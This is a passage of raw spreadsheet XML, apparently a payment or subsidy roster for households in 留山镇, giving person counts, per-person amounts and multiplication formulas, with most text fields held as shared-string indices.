        <v>224</v>
      </c>
      <c r="K1272" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1273" ht="23" customHeight="1" spans="1:11">
      <c r="A1273" s="13" t="s">
        <v>3401</v>
      </c>
      <c r="B1273" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1273" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1273" s="14" t="s">
        <v>3402</v>
      </c>
      <c r="E1273" s="14" t="s">
        <v>3403</v>
      </c>
      <c r="F1273" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1273" s="14">
        <v>2</v>
      </c>
      <c r="H1273" s="14">
        <v>300</v>
      </c>
      <c r="I1273" s="14">
        <f>H1273*G1273</f>
        <v>600</v>
      </c>
      <c r="J1273" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1273" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1274" ht="23" customHeight="1" spans="1:11">
      <c r="A1274" s="13" t="s">
        <v>3404</v>
      </c>
      <c r="B1274" s="14" t="str">
        <f>B1273</f>
        <v>留山镇</v>
      </c>
      <c r="C1274" s="14" t="str">
        <f>C1273</f>
        <v>留山镇</v>
      </c>
      <c r="D1274" s="13" t="s">
        <v>3405</v>
      </c>
      <c r="E1274" s="13" t="s">
        <v>2538</v>
      </c>
      <c r="F1274" s="14">
        <f>F1273</f>
        <v>4113210399</v>
      </c>
      <c r="G1274" s="14"/>
      <c r="H1274" s="14"/>
      <c r="I1274" s="14"/>
      <c r="J1274" s="14"/>
      <c r="K1274" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1275" ht="23" customHeight="1" spans="1:11">
      <c r="A1275" s="13" t="s">
        <v>3406</v>
      </c>
      <c r="B1275" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1275" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1275" s="14" t="s">
        <v>3407</v>
      </c>
      <c r="E1275" s="14" t="s">
        <v>3408</v>
      </c>
      <c r="F1275" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1275" s="14">
        <v>2</v>
      </c>
      <c r="H1275" s="14">
        <v>300</v>
      </c>
      <c r="I1275" s="14">
        <f>H1275*G1275</f>
        <v>600</v>
      </c>
      <c r="J1275" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1275" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1276" ht="23" customHeight="1" spans="1:11">
      <c r="A1276" s="13" t="s">
        <v>3409</v>
      </c>
      <c r="B1276" s="14" t="str">
        <f>B1275</f>
        <v>留山镇</v>
      </c>
      <c r="C1276" s="14" t="str">
        <f>C1275</f>
        <v>留山镇</v>
      </c>
      <c r="D1276" s="13" t="s">
        <v>3410</v>
      </c>
      <c r="E1276" s="13" t="s">
        <v>3411</v>
      </c>
      <c r="F1276" s="14">
        <f>F1275</f>
        <v>4113210399</v>
      </c>
      <c r="G1276" s="14"/>
      <c r="H1276" s="14"/>
      <c r="I1276" s="14"/>
      <c r="J1276" s="14"/>
      <c r="K1276" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1277" ht="23" customHeight="1" spans="1:11">
      <c r="A1277" s="13" t="s">
        <v>3412</v>
      </c>
      <c r="B1277" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1277" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1277" s="14" t="s">
        <v>3413</v>
      </c>
      <c r="E1277" s="14" t="s">
        <v>3414</v>
      </c>
      <c r="F1277" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1277" s="14">
        <v>2</v>
      </c>
      <c r="H1277" s="14">
        <v>300</v>
      </c>
      <c r="I1277" s="14">
        <f>H1277*G1277</f>
        <v>600</v>
      </c>
      <c r="J1277" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1277" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1278" ht="23" customHeight="1" spans="1:11">
      <c r="A1278" s="13" t="s">
        <v>3415</v>
      </c>
      <c r="B1278" s="14" t="str">
        <f>B1277</f>
        <v>留山镇</v>
      </c>
      <c r="C1278" s="14" t="str">
        <f>C1277</f>
        <v>留山镇</v>
      </c>
      <c r="D1278" s="13" t="s">
        <v>3416</v>
      </c>
      <c r="E1278" s="13" t="s">
        <v>3417</v>
      </c>
      <c r="F1278" s="14">
        <f>F1277</f>
        <v>4113210399</v>
      </c>
      <c r="G1278" s="14"/>
      <c r="H1278" s="14"/>
      <c r="I1278" s="14"/>
      <c r="J1278" s="14"/>
      <c r="K1278" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1279" ht="23" customHeight="1" spans="1:11">
      <c r="A1279" s="13" t="s">
        <v>3418</v>
      </c>
      <c r="B1279" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1279" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1279" s="14" t="s">
        <v>3419</v>
      </c>
      <c r="E1279" s="14" t="s">
        <v>3359</v>
      </c>
      <c r="F1279" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1279" s="14">
        <v>2</v>
      </c>
      <c r="H1279" s="14">
        <v>300</v>
      </c>
      <c r="I1279" s="14">
        <f>H1279*G1279</f>
        <v>600</v>
      </c>
      <c r="J1279" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1279" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1280" ht="23" customHeight="1" spans="1:11">
      <c r="A1280" s="13" t="s">
        <v>3420</v>
      </c>
      <c r="B1280" s="14" t="str">
        <f>B1279</f>
        <v>留山镇</v>
      </c>
      <c r="C1280" s="14" t="str">
        <f>C1279</f>
        <v>留山镇</v>
      </c>
      <c r="D1280" s="13" t="s">
        <v>3421</v>
      </c>
      <c r="E1280" s="13" t="s">
        <v>3414</v>
      </c>
      <c r="F1280" s="14">
        <f>F1279</f>
        <v>4113210399</v>
      </c>
      <c r="G1280" s="14"/>
      <c r="H1280" s="14"/>
      <c r="I1280" s="14"/>
      <c r="J1280" s="14"/>
      <c r="K1280" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1281" ht="23" customHeight="1" spans="1:11">
      <c r="A1281" s="13" t="s">
        <v>3422</v>
      </c>
      <c r="B1281" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1281" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1281" s="14" t="s">
        <v>3423</v>
      </c>
      <c r="E1281" s="14" t="s">
        <v>3368</v>
      </c>
      <c r="F1281" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1281" s="14">
        <v>1</v>
      </c>
      <c r="H1281" s="14">
        <v>340</v>
      </c>
      <c r="I1281" s="14">
        <f>H1281*G1281</f>
        <v>340</v>
      </c>
      <c r="J1281" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1281" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1282" ht="23" customHeight="1" spans="1:11">
      <c r="A1282" s="13" t="s">
        <v>3424</v>
      </c>
      <c r="B1282" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1282" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1282" s="14" t="s">
        <v>3425</v>
      </c>
      <c r="E1282" s="14" t="s">
        <v>3329</v>
      </c>
      <c r="F1282" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1282" s="14">
        <v>1</v>
      </c>
      <c r="H1282" s="14">
        <v>340</v>
      </c>
      <c r="I1282" s="14">
        <f>H1282*G1282</f>
        <v>340</v>
      </c>
      <c r="J1282" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1282" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1283" ht="23" customHeight="1" spans="1:11">
      <c r="A1283" s="13" t="s">
        <v>3426</v>
      </c>
      <c r="B1283" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1283" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1283" s="14" t="s">
        <v>3427</v>
      </c>
      <c r="E1283" s="14" t="s">
        <v>3428</v>
      </c>
      <c r="F1283" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1283" s="14">
        <v>1</v>
      </c>
      <c r="H1283" s="14">
        <v>340</v>
      </c>
      <c r="I1283" s="14">
        <f>H1283*G1283</f>
        <v>340</v>
      </c>
      <c r="J1283" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1283" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1284" ht="23" customHeight="1" spans="1:11">
      <c r="A1284" s="13" t="s">
        <v>3429</v>
      </c>
      <c r="B1284" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1284" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1284" s="14" t="s">
        <v>3430</v>
      </c>
      <c r="E1284" s="14" t="s">
        <v>3431</v>
      </c>
      <c r="F1284" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1284" s="14">
        <v>1</v>
      </c>
      <c r="H1284" s="14">
        <v>340</v>
      </c>
      <c r="I1284" s="14">
        <f>H1284*G1284</f>
        <v>340</v>
      </c>
      <c r="J1284" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1284" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1285" ht="23" customHeight="1" spans="1:11">
      <c r="A1285" s="13" t="s">
        <v>3432</v>
      </c>
      <c r="B1285" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1285" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1285" s="14" t="s">
        <v>3433</v>
      </c>
      <c r="E1285" s="14" t="s">
        <v>3434</v>
      </c>
      <c r="F1285" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1285" s="14">
        <v>2</v>
      </c>
      <c r="H1285" s="14">
        <v>300</v>
      </c>
      <c r="I1285" s="14">
        <f>H1285*G1285</f>
        <v>600</v>
      </c>
      <c r="J1285" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1285" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1286" ht="23" customHeight="1" spans="1:11">
      <c r="A1286" s="13" t="s">
        <v>3435</v>
      </c>
      <c r="B1286" s="14" t="str">
        <f>B1285</f>
        <v>留山镇</v>
      </c>
      <c r="C1286" s="14" t="str">
        <f>C1285</f>
        <v>留山镇</v>
      </c>
      <c r="D1286" s="13" t="s">
        <v>3436</v>
      </c>
      <c r="E1286" s="13" t="s">
        <v>3320</v>
      </c>
      <c r="F1286" s="14">
        <f>F1285</f>
        <v>4113210399</v>
      </c>
      <c r="G1286" s="14"/>
      <c r="H1286" s="14"/>
      <c r="I1286" s="14"/>
      <c r="J1286" s="14"/>
      <c r="K1286" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1287" ht="23" customHeight="1" spans="1:11">
      <c r="A1287" s="13" t="s">
        <v>3437</v>
      </c>
      <c r="B1287" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1287" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1287" s="14" t="s">
        <v>3438</v>
      </c>
      <c r="E1287" s="14" t="s">
        <v>3439</v>
      </c>
      <c r="F1287" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1287" s="14">
        <v>3</v>
      </c>
      <c r="H1287" s="14">
        <v>265</v>
      </c>
      <c r="I1287" s="14">
        <f>H1287*G1287</f>
        <v>795</v>
      </c>
      <c r="J1287" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1287" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1288" ht="23" customHeight="1" spans="1:11">
      <c r="A1288" s="13" t="s">
        <v>3440</v>
      </c>
      <c r="B1288" s="14" t="str">
        <f>B1287</f>
        <v>留山镇</v>
      </c>
      <c r="C1288" s="14" t="str">
        <f>C1287</f>
        <v>留山镇</v>
      </c>
      <c r="D1288" s="13" t="s">
        <v>3441</v>
      </c>
      <c r="E1288" s="13" t="s">
        <v>3442</v>
      </c>
      <c r="F1288" s="14">
        <f>F1287</f>
        <v>4113210399</v>
      </c>
      <c r="G1288" s="14"/>
      <c r="H1288" s="14"/>
      <c r="I1288" s="14"/>
      <c r="J1288" s="14"/>
      <c r="K1288" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1289" ht="23" customHeight="1" spans="1:11">
      <c r="A1289" s="13" t="s">
        <v>3443</v>
      </c>
      <c r="B1289" s="14" t="str">
        <f>B1288</f>
        <v>留山镇</v>
      </c>
      <c r="C1289" s="14" t="str">
        <f>C1288</f>
        <v>留山镇</v>
      </c>
      <c r="D1289" s="13" t="s">
        <v>3444</v>
      </c>
      <c r="E1289" s="13" t="s">
        <v>3445</v>
      </c>
      <c r="F1289" s="14">
        <f>F1288</f>
        <v>4113210399</v>
      </c>
      <c r="G1289" s="14"/>
      <c r="H1289" s="14"/>
      <c r="I1289" s="14"/>
      <c r="J1289" s="14"/>
      <c r="K1289" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1290" ht="23" customHeight="1" spans="1:11">
      <c r="A1290" s="13" t="s">
        <v>3446</v>
      </c>
      <c r="B1290" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1290" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1290" s="14" t="s">
        <v>3447</v>
      </c>
      <c r="E1290" s="14" t="s">
        <v>3434</v>
      </c>
      <c r="F1290" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1290" s="14">
        <v>1</v>
      </c>
      <c r="H1290" s="14">
        <v>340</v>
      </c>
      <c r="I1290" s="14">
        <f t="shared" ref="I1290:I1302" si="63">H1290*G1290</f>
        <v>340</v>
      </c>
      <c r="J1290" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1290" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1291" ht="23" customHeight="1" spans="1:11">
      <c r="A1291" s="13" t="s">
        <v>3448</v>
      </c>
      <c r="B1291" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1291" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1291" s="14" t="s">
        <v>3449</v>
      </c>
      <c r="E1291" s="14" t="s">
        <v>3439</v>
      </c>
      <c r="F1291" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1291" s="14">
        <v>1</v>
      </c>
      <c r="H1291" s="14">
        <v>340</v>
      </c>
      <c r="I1291" s="14">
        <f t="shared" si="63"/>
        <v>340</v>
      </c>
      <c r="J1291" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1291" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1292" ht="23" customHeight="1" spans="1:11">
      <c r="A1292" s="13" t="s">
        <v>3450</v>
      </c>
      <c r="B1292" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1292" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1292" s="14" t="s">
        <v>3451</v>
      </c>
      <c r="E1292" s="14" t="s">
        <v>3452</v>
      </c>
      <c r="F1292" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1292" s="14">
        <v>1</v>
      </c>
      <c r="H1292" s="14">
        <v>340</v>
      </c>
      <c r="I1292" s="14">
        <f t="shared" si="63"/>
        <v>340</v>
      </c>
      <c r="J1292" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1292" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1293" ht="23" customHeight="1" spans="1:11">
      <c r="A1293" s="13" t="s">
        <v>3453</v>
      </c>
      <c r="B1293" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1293" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1293" s="14" t="s">
        <v>3454</v>
      </c>
      <c r="E1293" s="14" t="s">
        <v>3455</v>
      </c>
      <c r="F1293" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1293" s="14">
        <v>1</v>
      </c>
      <c r="H1293" s="14">
        <v>340</v>
      </c>
      <c r="I1293" s="14">
        <f t="shared" si="63"/>
        <v>340</v>
      </c>
      <c r="J1293" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1293" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1294" ht="23" customHeight="1" spans="1:11">
      <c r="A1294" s="13" t="s">
        <v>3456</v>
      </c>
      <c r="B1294" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1294" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1294" s="14" t="s">
        <v>3457</v>
      </c>
      <c r="E1294" s="14" t="s">
        <v>3458</v>
      </c>
      <c r="F1294" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1294" s="14">
        <v>1</v>
      </c>
      <c r="H1294" s="14">
        <v>340</v>
      </c>
      <c r="I1294" s="14">
        <f t="shared" si="63"/>
        <v>340</v>
      </c>
      <c r="J1294" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1294" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1295" ht="23" customHeight="1" spans="1:11">
      <c r="A1295" s="13" t="s">
        <v>3459</v>
      </c>
      <c r="B1295" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1295" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1295" s="14" t="s">
        <v>3460</v>
      </c>
      <c r="E1295" s="14" t="s">
        <v>3431</v>
      </c>
      <c r="F1295" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1295" s="14">
        <v>2</v>
      </c>
      <c r="H1295" s="14">
        <v>300</v>
      </c>
      <c r="I1295" s="14">
        <f t="shared" si="63"/>
        <v>600</v>
      </c>
      <c r="J1295" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1295" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1296" ht="23" customHeight="1" spans="1:11">
      <c r="A1296" s="13" t="s">
        <v>3461</v>
      </c>
      <c r="B1296" s="14" t="str">
        <f>B1295</f>
        <v>留山镇</v>
      </c>
      <c r="C1296" s="14" t="str">
        <f>C1295</f>
        <v>留山镇</v>
      </c>
      <c r="D1296" s="13" t="s">
        <v>3462</v>
      </c>
      <c r="E1296" s="13" t="s">
        <v>3463</v>
      </c>
      <c r="F1296" s="14">
        <f>F1295</f>
        <v>4113210399</v>
      </c>
      <c r="G1296" s="14"/>
      <c r="H1296" s="14"/>
      <c r="I1296" s="14"/>
      <c r="J1296" s="14"/>
      <c r="K1296" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1297" ht="23" customHeight="1" spans="1:11">
      <c r="A1297" s="13" t="s">
        <v>3464</v>
      </c>
      <c r="B1297" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1297" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1297" s="14" t="s">
        <v>3465</v>
      </c>
      <c r="E1297" s="14" t="s">
        <v>3466</v>
      </c>
      <c r="F1297" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1297" s="14">
        <v>2</v>
      </c>
      <c r="H1297" s="14">
        <v>300</v>
      </c>
      <c r="I1297" s="14">
        <f>H1297*G1297</f>
        <v>600</v>
      </c>
      <c r="J1297" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1297" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1298" ht="23" customHeight="1" spans="1:11">
      <c r="A1298" s="13" t="s">
        <v>3467</v>
      </c>
      <c r="B1298" s="14" t="str">
        <f>B1297</f>
        <v>留山镇</v>
      </c>
      <c r="C1298" s="14" t="str">
        <f>C1297</f>
        <v>留山镇</v>
      </c>
      <c r="D1298" s="14" t="s">
        <v>3468</v>
      </c>
      <c r="E1298" s="13" t="s">
        <v>3469</v>
      </c>
      <c r="F1298" s="14">
        <f>F1297</f>
        <v>4113210399</v>
      </c>
      <c r="G1298" s="14"/>
      <c r="H1298" s="14"/>
      <c r="I1298" s="14"/>
      <c r="J1298" s="14"/>
      <c r="K1298" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1299" ht="23" customHeight="1" spans="1:11">
      <c r="A1299" s="13" t="s">
        <v>3470</v>
      </c>
      <c r="B1299" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1299" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1299" s="14" t="s">
        <v>3471</v>
      </c>
      <c r="E1299" s="14" t="s">
        <v>3472</v>
      </c>
      <c r="F1299" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1299" s="14">
        <v>1</v>
      </c>
      <c r="H1299" s="14">
        <v>340</v>
      </c>
      <c r="I1299" s="14">
        <f>H1299*G1299</f>
        <v>340</v>
      </c>
      <c r="J1299" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1299" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1300" ht="23" customHeight="1" spans="1:11">
      <c r="A1300" s="13" t="s">
        <v>3473</v>
      </c>
      <c r="B1300" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1300" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1300" s="14" t="s">
        <v>3474</v>
      </c>
      <c r="E1300" s="14" t="s">
        <v>3323</v>
      </c>
      <c r="F1300" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1300" s="14">
        <v>1</v>
      </c>
      <c r="H1300" s="14">
        <v>340</v>
      </c>
      <c r="I1300" s="14">
        <f>H1300*G1300</f>
        <v>340</v>
      </c>
      <c r="J1300" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1300" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1301" ht="23" customHeight="1" spans="1:11">
      <c r="A1301" s="13" t="s">
        <v>3475</v>
      </c>
      <c r="B1301" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1301" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1301" s="14" t="s">
        <v>3476</v>
      </c>
      <c r="E1301" s="14" t="s">
        <v>3414</v>
      </c>
      <c r="F1301" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1301" s="14">
        <v>1</v>
      </c>
      <c r="H1301" s="14">
        <v>340</v>
      </c>
      <c r="I1301" s="14">
        <f>H1301*G1301</f>
        <v>340</v>
      </c>
      <c r="J1301" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1301" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1302" ht="23" customHeight="1" spans="1:11">
      <c r="A1302" s="13" t="s">
        <v>3477</v>
      </c>
      <c r="B1302" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1302" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1302" s="14" t="s">
        <v>3478</v>
      </c>
      <c r="E1302" s="14" t="s">
        <v>2538</v>
      </c>
      <c r="F1302" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1302" s="14">
        <v>1</v>
      </c>
      <c r="H1302" s="14">
        <v>340</v>
      </c>
      <c r="I1302" s="14">
        <f>H1302*G1302</f>
        <v>340</v>
      </c>
      <c r="J1302" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1302" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1303" ht="23" customHeight="1" spans="1:11">
      <c r="A1303" s="13" t="s">
        <v>3479</v>
      </c>
      <c r="B1303" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1303" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1303" s="14" t="s">
        <v>3480</v>
      </c>
      <c r="E1303" s="14" t="s">
        <v>3481</v>
      </c>
      <c r="F1303" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1303" s="14">
        <v>3</v>
      </c>
      <c r="H1303" s="14">
        <v>265</v>
      </c>
      <c r="I1303" s="14">
        <f>H1303*G1303</f>
        <v>795</v>
      </c>
      <c r="J1303" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1303" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1304" ht="23" customHeight="1" spans="1:11">
      <c r="A1304" s="13" t="s">
        <v>3482</v>
      </c>
      <c r="B1304" s="14" t="str">
        <f>B1303</f>
        <v>留山镇</v>
      </c>
      <c r="C1304" s="14" t="str">
        <f>C1303</f>
        <v>留山镇</v>
      </c>
      <c r="D1304" s="13" t="s">
        <v>3483</v>
      </c>
      <c r="E1304" s="20" t="s">
        <v>3484</v>
      </c>
      <c r="F1304" s="14">
        <f>F1303</f>
        <v>4113210399</v>
      </c>
      <c r="G1304" s="14"/>
      <c r="H1304" s="14"/>
      <c r="I1304" s="14"/>
      <c r="J1304" s="14"/>
      <c r="K1304" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1305" ht="23" customHeight="1" spans="1:11">
      <c r="A1305" s="13" t="s">
        <v>3485</v>
      </c>
      <c r="B1305" s="14" t="str">
        <f>B1304</f>
        <v>留山镇</v>
      </c>
      <c r="C1305" s="14" t="str">
        <f>C1304</f>
        <v>留山镇</v>
      </c>
      <c r="D1305" s="13" t="s">
        <v>3486</v>
      </c>
      <c r="E1305" s="13" t="s">
        <v>3487</v>
      </c>
      <c r="F1305" s="14">
        <f>F1304</f>
        <v>4113210399</v>
      </c>
      <c r="G1305" s="14"/>
      <c r="H1305" s="14"/>
      <c r="I1305" s="14"/>
      <c r="J1305" s="14"/>
      <c r="K1305" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1306" ht="23" customHeight="1" spans="1:11">
      <c r="A1306" s="13" t="s">
        <v>3488</v>
      </c>
      <c r="B1306" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1306" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1306" s="14" t="s">
        <v>3489</v>
      </c>
      <c r="E1306" s="14" t="s">
        <v>3490</v>
      </c>
      <c r="F1306" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1306" s="14">
        <v>1</v>
      </c>
      <c r="H1306" s="14">
        <v>340</v>
      </c>
      <c r="I1306" s="14">
        <f>H1306*G1306</f>
        <v>340</v>
      </c>
      <c r="J1306" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1306" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1307" ht="23" customHeight="1" spans="1:11">
      <c r="A1307" s="13" t="s">
        <v>3491</v>
      </c>
      <c r="B1307" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1307" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1307" s="14" t="s">
        <v>3492</v>
      </c>
      <c r="E1307" s="14" t="s">
        <v>3493</v>
      </c>
      <c r="F1307" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1307" s="14">
        <v>1</v>
      </c>
      <c r="H1307" s="14">
        <v>340</v>
      </c>
      <c r="I1307" s="14">
        <f>H1307*G1307</f>
        <v>340</v>
      </c>
      <c r="J1307" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1307" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1308" ht="23" customHeight="1" spans="1:11">
      <c r="A1308" s="13" t="s">
        <v>3494</v>
      </c>
      <c r="B1308" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1308" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1308" s="14" t="s">
        <v>3495</v>
      </c>
      <c r="E1308" s="14" t="s">
        <v>3380</v>
      </c>
      <c r="F1308" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1308" s="14">
        <v>2</v>
      </c>
      <c r="H1308" s="14">
        <v>300</v>
      </c>
      <c r="I1308" s="14">
        <f>H1308*G1308</f>
        <v>600</v>
      </c>
      <c r="J1308" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1308" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1309" ht="23" customHeight="1" spans="1:11">
      <c r="A1309" s="13" t="s">
        <v>3496</v>
      </c>
      <c r="B1309" s="14" t="str">
        <f>B1308</f>
        <v>留山镇</v>
      </c>
      <c r="C1309" s="14" t="str">
        <f>C1308</f>
        <v>留山镇</v>
      </c>
      <c r="D1309" s="13" t="s">
        <v>3497</v>
      </c>
      <c r="E1309" s="13" t="s">
        <v>3498</v>
      </c>
      <c r="F1309" s="14">
        <f>F1308</f>
        <v>4113210399</v>
      </c>
      <c r="G1309" s="14"/>
      <c r="H1309" s="14"/>
      <c r="I1309" s="14"/>
      <c r="J1309" s="14"/>
      <c r="K1309" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1310" ht="23" customHeight="1" spans="1:11">
      <c r="A1310" s="13" t="s">
        <v>3499</v>
      </c>
      <c r="B1310" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1310" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1310" s="14" t="s">
        <v>3500</v>
      </c>
      <c r="E1310" s="14" t="s">
        <v>3501</v>
      </c>
      <c r="F1310" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1310" s="14">
        <v>1</v>
      </c>
      <c r="H1310" s="14">
        <v>340</v>
      </c>
      <c r="I1310" s="14">
        <f>H1310*G1310</f>
        <v>340</v>
      </c>
      <c r="J1310" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1310" s="14" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1311" ht="23" customHeight="1" spans="1:11">
      <c r="A1311" s="13" t="s">
        <v>3502</v>
      </c>
      <c r="B1311" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="C1311" s="14" t="s">
        <v>3306</v>
      </c>
      <c r="D1311" s="14" t="s">
        <v>3503</v>
      </c>
      <c r="E1311" s="14" t="s">
        <v>3311</v>
      </c>
      <c r="F1311" s="14">
        <v>4113210399</v>
      </c>
      <c r="G1311" s="14">
        <v>2</v>
      </c>
      <c r="H1311" s="14">
        <v>300</v>
      </c>
      <c r="I1311" s="14">
        <f>H1311*G1311</f>
        <v>600</v>
      </c>
      <c r="J1311" s="14" t="s">
        <v>224</v>
      </c>
      <c r="K1311" s="14" t="s">
        <v>225</v>
      </c>
    </row>
